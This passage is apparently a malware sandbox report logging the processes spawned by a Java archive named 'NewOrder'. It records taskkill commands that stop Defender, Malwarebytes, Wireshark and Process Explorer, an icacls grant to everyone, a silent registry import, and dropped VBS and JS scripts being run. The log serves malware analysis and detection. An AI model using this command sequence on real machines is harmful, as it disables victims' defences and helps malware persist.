Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MsMpEng.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MpUXSrv.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MpCmdRun.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\cimv2 Path Win32_PnpSignedDriver Get /Format:List
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM NisSrv.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM ConfigSecurityPolicy.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM procexp.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM wireshark.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM tshark.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM text2pcap.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM rawshark.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mergecap.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM editcap.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM dumpcap.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM capinfos.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mbam.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mbamscheduler.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mbamservice.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM AdAwareService.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe "C:\Program Files (x86)\Java\jre-1.8\bin\java.exe" -javaagent:"C:\Users\user\AppData\Local\Temp\jartracer.jar" -jar "C:\Users\user\Desktop\NewOrder - P2D041197.jar" Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Process created: C:\Windows\SysWOW64\wscript.exe wscript C:\Users\user\zbrspjjraf.js Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe "C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\user\AppData\Roaming\krmyqqmohp.txt" Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe "C:\Program Files (x86)\Java\jre-1.8\bin\java.exe" -jar C:\Users\user\AppData\Local\Temp\_0.337891030941391956323023258775833856.class Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4614601071766058238.vbs Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4410908985771939559.vbs Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\xcopy.exe xcopy "C:\Program Files (x86)\Java\jre-1.8" "C:\Users\user\AppData\Roaming\Oracle\" /e Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM UserAccountControlSettings.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c regedit.exe /s C:\Users\user\AppData\Local\Temp\mNuEFMHNfs1412424943545557855.reg Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM ProcessHacker.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM procexp.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MSASCui.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MsMpEng.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MpUXSrv.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\cimv2 Path Win32_PnpSignedDriver Get /Format:List Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM NisSrv.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM ConfigSecurityPolicy.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM procexp.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM wireshark.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM tshark.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM text2pcap.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM rawshark.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c regedit.exe /s C:\Users\user\AppData\Local\Temp\mNuEFMHNfs1412424943545557855.reg Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM editcap.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM dumpcap.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM capinfos.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mbam.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mbamscheduler.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mbamservice.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM AdAwareService.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MpUXSrv.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive508991219844214216.vbs Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive6937263458449411198.vbs Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Process created: C:\Windows\SysWOW64\xcopy.exe xcopy "C:\Program Files (x86)\Java\jre-1.8" "C:\Users\user\AppData\Roaming\Oracle\" /e Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4614601071766058238.vbs Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive508991219844214216.vbs
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4410908985771939559.vbs
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive6937263458449411198.vbs
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\regedit.exe regedit.exe /s C:\Users\user\AppData\Local\Temp\mNuEFMHNfs1412424943545557855.reg
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Section loaded: version.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: jscript.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msdart.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msxml3.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: version.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: opengl32.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: glu32.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Section loaded: winmm.dll Jump to behavior
